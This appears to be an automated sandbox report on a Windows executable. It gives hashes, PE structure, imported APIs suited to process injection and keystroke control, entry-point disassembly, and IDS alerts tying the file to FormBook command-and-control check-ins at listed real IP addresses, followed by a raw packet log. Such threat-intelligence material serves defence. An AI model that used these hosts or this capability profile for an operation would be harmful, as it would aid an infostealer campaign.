                                                          SHA-512:D657BABEDF758575AB0F301DCF3BADE3B21F9BDDCC0EFD5A2D171FB92D3BB86DBFFEB058EAD17E03C5210214EF2397D32113D5BFD3EA09997CCF9E2895046A7F
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:|nr..7DUCm..>...i.52...{4L...147ZS7DUC5147ZS7DUC5147ZS7DUC5.47Z](.[C.8...R{.t.]XG.*!X#'"X.WV4=X0u!P.FB4s^*u.zb.Z57RjXN?.47ZS7DU:48..:4.y5$..TP.I..yUV.-...x5$.+...oW#..\R\.:4.DUC5147Z.rDU.404..EjDUC5147Z.7FTH4:47NW7DUC5147Zs"DUC%147jW7DU.51$7ZS5DUE5147ZS7BUC5147ZS.@UC7147ZS7FU..14'ZS'DUC5!47JS7DUC5!47ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC514..6O0UC5E'3ZS'DUC!547JS7DUC5147ZS7DUc51T7ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5147ZS7DUC5
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.189069058457696
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:hkLFB22XxS.exe
                                                          File size:1'233'920 bytes
                                                          MD5:46d91dbe786e1518a8715e29f5fba781
                                                          SHA1:5da70934c50a4a626ee73bc4797cfd24e60c5a96
                                                          SHA256:04268eb791ba671f136525002bd4f25526b6d3e64b2b7b4e169df2498a2ea033
                                                          SHA512:a76b633db1d81d15b9a209e8e7e1e760fc79ea451d74237b0c40abdc74ad3e7d47166e7488bccb24d025cc60dee17848e2c24256a70efd2bbb750c17acdd7d69
                                                          SSDEEP:24576:TAHnh+eWsN3skA4RV1Hom2KXMmHaRwi+mhLMGowpdTnVE6j3oYaon5:eh+ZkldoPK8YaRwivht37nVEzYa0
                                                          TLSH:FA45BE02B3D1C036FFAB92739B66F64156BD79254123852F13981DB9BC701B2237E663
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                                          Icon Hash:aaf3e3e3938382a0
                                                          Entrypoint:0x42800a
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x6666512A [Mon Jun 10 01:04:42 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                          Instruction
                                                          call 00007F95D88F457Dh
                                                          jmp 00007F95D88E7334h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007F95D88E74BAh
                                                          cmp edi, eax
                                                          jc 00007F95D88E781Eh
                                                          bt dword ptr [004C41FCh], 01h
                                                          jnc 00007F95D88E74B9h
                                                          rep movsb
                                                          jmp 00007F95D88E77CCh
                                                          cmp ecx, 00000080h
                                                          jc 00007F95D88E7684h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007F95D88E74C0h
                                                          bt dword ptr [004BF324h], 01h
                                                          jc 00007F95D88E7990h
                                                          bt dword ptr [004C41FCh], 00000000h
                                                          jnc 00007F95D88E765Dh
                                                          test edi, 00000003h
                                                          jne 00007F95D88E766Eh
                                                          test esi, 00000003h
                                                          jne 00007F95D88E764Dh
                                                          bt edi, 02h
                                                          jnc 00007F95D88E74BFh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007F95D88E74C3h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007F95D88E7515h
                                                          bt esi, 03h
                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD5 build 40629
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD5 build 40629
                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbc0cc | 0x17c | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x62d20 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x12b000 | 0x7134 | .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4b50 | 0x40 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x1000 | 0x8dfdd | 0x8e000 | 310e36668512d53489c005622bb1b4a9 | False | 0.5735602580325704 | data | 6.675248351711057 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata | 0x8f000 | 0x2fd8e | 0x2fe00 | 748cf1ab2605ce1fd72d53d912abb68f | False | 0.32828818537859006 | data | 5.763244005758284 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data | 0xbf000 | 0x8f74 | 0x5200 | aae9601d920f07080bdfadf43dfeff12 | False | 0.1017530487804878 | data | 1.1963819235530628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc | 0xc8000 | 0x62d20 | 0x62e00 | 560b2a2b198c4f91df199c777c37c217 | False | 0.9335567122313527 | data | 7.906347336305752 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc | 0x12b000 | 0x7134 | 0x7200 | f04128ad0f87f42830e4a6cdbc38c719 | False | 0.7617530153508771 | data | 6.783955557128661 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                          RT_ICON | 0xc85a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                                          RT_ICON | 0xc86d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                                          RT_ICON | 0xc87f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                          RT_ICON | 0xc8920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                                                          RT_ICON | 0xc8c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                                                          RT_ICON | 0xc8d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                                                          RT_ICON | 0xc9bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                                                          RT_ICON | 0xca480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                                                          RT_ICON | 0xca9e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                                                          RT_ICON | 0xccf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                                                          RT_ICON | 0xce038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                                                          RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 0.9
                                                          RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                          RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                                                          RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                          RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                          RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                          RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                          RT_STRING | 0xd0660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                          RT_RCDATA | 0xd07b8 | 0x59fb8 | data | | | 1.000328297627575
                                                          RT_GROUP_ICON | 0x12a770 | 0x76 | data | English | Great Britain | 0.6610169491525424
                                                          RT_GROUP_ICON | 0x12a7e8 | 0x14 | data | English | Great Britain | 1.25
                                                          RT_GROUP_ICON | 0x12a7fc | 0x14 | data | English | Great Britain | 1.15
                                                          RT_GROUP_ICON | 0x12a810 | 0x14 | data | English | Great Britain | 1.25
                                                          RT_VERSION | 0x12a824 | 0x10c | data | English | Great Britain | 0.582089552238806
                                                          RT_MANIFEST | 0x12a930 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                          DLL | Import
                                                          WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLL | GetProcessMemoryInfo
                                                          IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dll | IsThemeActive
                                                          KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/02/24-14:03:53.795147 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49734 | 80 | 192.168.2.6 | 38.47.158.215
07/02/24-14:04:07.263536 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49738 | 80 | 192.168.2.6 | 3.33.130.190
07/02/24-14:02:54.728878 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49719 | 80 | 192.168.2.6 | 65.181.132.158
07/02/24-14:04:48.099149 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49751 | 80 | 192.168.2.6 | 108.186.253.49
07/02/24-14:05:14.826284 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49759 | 80 | 192.168.2.6 | 87.236.19.243
07/02/24-14:05:01.357570 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49755 | 80 | 192.168.2.6 | 3.33.130.190
07/02/24-14:04:33.563081 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49747 | 80 | 192.168.2.6 | 15.197.142.173
07/02/24-14:05:57.280319 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49772 | 80 | 192.168.2.6 | 188.114.97.3
07/02/24-14:05:28.296564 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49763 | 80 | 192.168.2.6 | 135.181.212.206
07/02/24-14:05:42.763941 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49768 | 80 | 192.168.2.6 | 191.6.208.133
07/02/24-14:03:26.452953 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49724 | 80 | 192.168.2.6 | 3.33.130.190
07/02/24-14:04:20.406030 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49743 | 80 | 192.168.2.6 | 3.33.130.190
07/02/24-14:03:39.747488 | TCP | 2855465 | ETPRO TROJAN FormBook CnC Checkin (GET) M2 | 49730 | 80 | 192.168.2.6 | 203.161.43.228
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Jul 2, 2024 14:04:40.433929920 CEST8049748108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:41.023118019 CEST8049748108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:41.023209095 CEST8049748108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:41.023263931 CEST4974880192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:41.943105936 CEST4974880192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:42.999644041 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:43.005254030 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.005358934 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:43.015467882 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:43.020292997 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.604095936 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.604166985 CEST8049749108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:43.604249954 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:44.518663883 CEST4974980192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.539098978 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.544001102 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:45.547161102 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.551078081 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:45.556952000 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:45.556962967 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:46.147147894 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:46.147418976 CEST8049750108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:46.147541046 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:47.065431118 CEST4975080192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.087079048 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.092152119 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.093378067 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.099148989 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.104055882 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.686291933 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.687143087 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:48.687201977 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.689558029 CEST4975180192.168.2.6108.186.253.49
                                                          Jul 2, 2024 14:04:48.694384098 CEST8049751108.186.253.49192.168.2.6
                                                          Jul 2, 2024 14:04:53.715130091 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:53.720154047 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:53.720241070 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:53.723051071 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:53.728070021 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:54.219724894 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:54.223128080 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:55.237306118 CEST4975280192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:55.242460012 CEST80497523.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.256659031 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:56.261666059 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.262161970 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:56.265100002 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:56.271491051 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.736021996 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:56.736159086 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:57.771042109 CEST4975380192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:57.776289940 CEST80497533.33.130.190192.168.2.6
                                                          Jul 2, 2024 14:04:58.818437099 CEST4975480192.168.2.63.33.130.190
                                                          Jul 2, 2024 14:04:58.824039936 CEST80497543.33.130.190192.168.2.6
